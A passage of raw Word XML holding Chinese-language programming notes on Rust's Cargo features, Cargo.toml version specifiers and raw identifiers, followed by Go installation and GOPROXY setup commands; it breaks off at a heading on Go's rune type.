      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建配置：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cargo.toml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cargo.lock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许开发者配置构建选项，如编译器选项、特性（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>features</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和目标平台。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F7AF44" w14:textId="4D225A8F" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>项目模板：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了创建新项目的模板，可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cargo new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令快速启动新项目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A72CA3" w14:textId="08DE2447" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了一个简单的命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cargo test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来运行项目的单元测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A48D75" w14:textId="066FC4D0" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基准测试：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cargo bench </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令进行基准测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0AAB5" w14:textId="270503CE" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cargo publish </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，开发者可以将他们的库发布到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> crates.io </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上，供其他开发者使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B5947" w14:textId="35EB82C8" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义构建脚本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许使用自定义的构建脚本来处理更复杂的构建需求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC0C7C" w14:textId="179B251D" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多目标项目：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持在一个项目中定义多个目标，如可执行文件、库、测试和基准测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BDC926" w14:textId="1E46A7AC" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨平台构建：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持跨多个平台构建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rust </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序，包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及各种嵌入式系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3CD57" w14:textId="5F857782" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建缓存：为了加快构建速度，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用构建缓存来存储编译后的依赖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B034366" w14:textId="694D8F75" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>离线工作：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持在没有互联网连接的情况下工作，它会自动使用本地缓存的依赖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC8BE8" w14:textId="3625F5A5" w:rsidR="005751CD" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件系统：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许开发者编写插件来扩展其功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6421535E" w14:textId="0E5035A0" w:rsidR="005C1D25" w:rsidRDefault="005751CD" w:rsidP="005751CD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境变量：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cargo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持通过环境变量来覆盖默认的构建和运行行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A370A74" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="1C35DE23" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="2C39ED7C" w14:textId="770E00CF" w:rsidR="005C1D25" w:rsidRDefault="00821734" w:rsidP="00821734">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">argo.toml  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖包版本控制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F426E11" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="355AE6D5" w14:textId="255DAEFE" w:rsidR="005C1D25" w:rsidRDefault="00821734" w:rsidP="005C1D25">
      <w:r w:rsidRPr="00821734">
        <w:t>The specifier </w:t>
      </w:r>
      <w:r w:rsidRPr="00821734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0.8.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00821734">
        <w:t> is actually shorthand for </w:t>
      </w:r>
      <w:r w:rsidRPr="00821734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>^0.8.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00821734">
        <w:t xml:space="preserve">, which means any version that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00821734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>at least 0.8.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00821734">
        <w:t xml:space="preserve"> but </w:t>
      </w:r>
      <w:r w:rsidRPr="00821734">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>below 0.9.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00821734">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BABD67" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="5D268AF4" w14:textId="2F61C251" w:rsidR="005C1D25" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字做标识符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767CE24D" w14:textId="4472F5D7" w:rsidR="00FC6083" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE46D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>r#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C6DA9" w14:textId="64B9A6EB" w:rsidR="00FC6083" w:rsidRPr="00FC6083" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:r w:rsidRPr="00CE46D5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>r#try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638DA754" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="6975CC7D" w14:textId="77777777" w:rsidR="00FC6083" w:rsidRPr="00FC6083" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:r w:rsidRPr="00FC6083">
        <w:t>fn r#match(needle: &amp;str, haystack: &amp;str) -&gt; bool {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732BD03" w14:textId="77777777" w:rsidR="00FC6083" w:rsidRPr="00FC6083" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:r w:rsidRPr="00FC6083">
        <w:t xml:space="preserve">    haystack.contains(needle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208A019F" w14:textId="77777777" w:rsidR="00FC6083" w:rsidRPr="00FC6083" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:r w:rsidRPr="00FC6083">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696CE8F5" w14:textId="77777777" w:rsidR="00FC6083" w:rsidRPr="00FC6083" w:rsidRDefault="00FC6083" w:rsidP="00FC6083"/>
    <w:p w14:paraId="1231E1B0" w14:textId="77777777" w:rsidR="00FC6083" w:rsidRPr="00FC6083" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:r w:rsidRPr="00FC6083">
        <w:t>fn main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EABD8E2" w14:textId="77777777" w:rsidR="00FC6083" w:rsidRPr="00FC6083" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:r w:rsidRPr="00FC6083">
        <w:t xml:space="preserve">    assert!(r#match("foo", "foobar"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EA8524" w14:textId="41AC1591" w:rsidR="005C1D25" w:rsidRDefault="00FC6083" w:rsidP="00FC6083">
      <w:r w:rsidRPr="00FC6083">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D927E83" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="10219B0C" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="351CB96A" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="27893586" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="37EE3987" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="304AB4C6" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="26D4BD04" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="7B81D33A" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="6A027B05" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="49F881EB" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="68825E41" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="3D3C9447" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRPr="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="741A0AE5" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="58B3409C" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="1591C65B" w14:textId="77777777" w:rsidR="005C1D25" w:rsidRPr="005C1D25" w:rsidRDefault="005C1D25" w:rsidP="005C1D25"/>
    <w:p w14:paraId="1A4BC2D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677EABDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="282" w:name="_Toc159779742"/>
      <w:r>
        <w:t>Go</w:t>
      </w:r>
      <w:bookmarkEnd w:id="282"/>
    </w:p>
    <w:p w14:paraId="01941D7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3C4D4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="_Toc159779743"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境准备</w:t>
      </w:r>
      <w:bookmarkEnd w:id="283"/>
    </w:p>
    <w:p w14:paraId="666E7DB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="_Toc159779744"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="284"/>
    </w:p>
    <w:p w14:paraId="37D95BF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://go.dev/dl/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A9CE60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155F02D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC6391" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># install go 1.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0584A8BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>wget https://go.dev/dl/go1.20.linux-amd64.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A2643" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>tar -zxvf go1.20.linux-amd64.tar.gz -C /usr/local/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AABCBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117AE26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>source /etc/profile.d/go.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480BB94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A8D316" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="_Toc159779745"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
    </w:p>
    <w:p w14:paraId="5CB6E748" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD38B65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>go env -w GO111MODULE=on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197A485" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>go env -w GOPROXY=https://goproxy.cn,direc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F3B7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE9F496" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取消代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705917F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go env -u GOPROXY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEBEB7D" w14:textId="77777777" w:rsidR="001565EA" w:rsidRDefault="001565EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43208CF3" w14:textId="77777777" w:rsidR="001565EA" w:rsidRDefault="001565EA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="286" w:name="_Toc159779746"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化项目流程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>
    </w:p>
    <w:p w14:paraId="6C9661DF" w14:textId="27612B30" w:rsidR="001565EA" w:rsidRDefault="001565EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本文档搜索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>go mod init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C76B0AD" w14:textId="77777777" w:rsidR="001565EA" w:rsidRDefault="001565EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F8B00D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="287" w:name="_Toc159779747"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的不常见写法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="287"/>
    </w:p>
    <w:p w14:paraId="7386B66A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1210FC98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="288" w:name="_Toc159779748"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rune</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="288"/>
    </w:p>
    <w:p w14:paraId="30B6FEE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
